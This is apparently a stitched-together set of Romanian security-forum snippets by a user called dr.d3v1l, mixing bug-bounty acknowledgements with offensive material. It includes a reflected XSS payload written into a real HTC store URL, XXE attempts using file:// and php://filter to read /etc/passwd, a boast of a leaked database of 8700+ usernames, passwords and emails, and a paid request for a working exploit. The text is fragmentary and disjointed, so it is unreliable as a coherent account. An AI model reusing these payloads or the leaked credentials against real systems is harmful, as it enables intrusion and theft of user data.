dr.d3v1l

https://github.com/Konloch/bytecode-viewer

Da, doar HOF

INFO -> http://www.telecomitalia.com/tit/it/footer/responsible-disclosure.html ->

Dear Dr.d3v1l The vulnerabilities you reported has been fixed. As a token of our appreciation we would like to offer you a t-shirt. If you would like a t-shirt please provide us with your preferred t-shirt size (S/M/L/XL/XXL) and on what address you would like to receive the t-shirt. Thanks in advance for your reply and thanks again for your report. Sincerely,

leak database 8700+ (user,pass,mail ecc)

PRIVATE BUGBOUNTY AM PRIMIT 2 VPS SI 1 DOMENIU PENTRU 1 AN. STATUS:FIXED

aici spunea ca mar hof aveai http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php

http://estore.htc.com/tw/buy/zh-TW/shop/SearchDisplay?searchTerm=asd'- confirm(document.domain)-'&storeId=10001&catalogId=10001&langId=-7&pageSize =20&beginIndex=0&sType=SimpleSearch&resultCatEntryType=2&showResultsPa ge=true&searchSource=Q&pageView=

5) da sunt autizat , doar ca au cerut ce pot exploita . De asta am pus ($$) , dar din cate am mai verificat ... nu merge

am incerca si cuv gopher:// file:// ftp:// php://filter/convert.base64-encode/resource=/etc/passwd , dar nimica . Am log per server de la request dar nu pot citi etc/passwd

xxe = XML External Entity

Salut Rst , cum as putea exploita complet aceasta xxe ? Am vazut un pic de topic de la owasp , da este local daca nu gresesc da se poate face si remote cred din cate am citit *Ofer o mica suma pentru cine ma ajuta sa gasesc un exploit valid .

http://www.ipgeek.net/109.166.136.78 ______________________________________ IP:109.166.136.78 Decimal:1839630414 ISP:Orange RomaniaOrganization:Orange RomaniaTime zone:Europe/BucharestIP Latitude:46 Longitude:25 Continent:EU

STATE:DUPLICATE bugbounty:https://hackerone.com/pornhub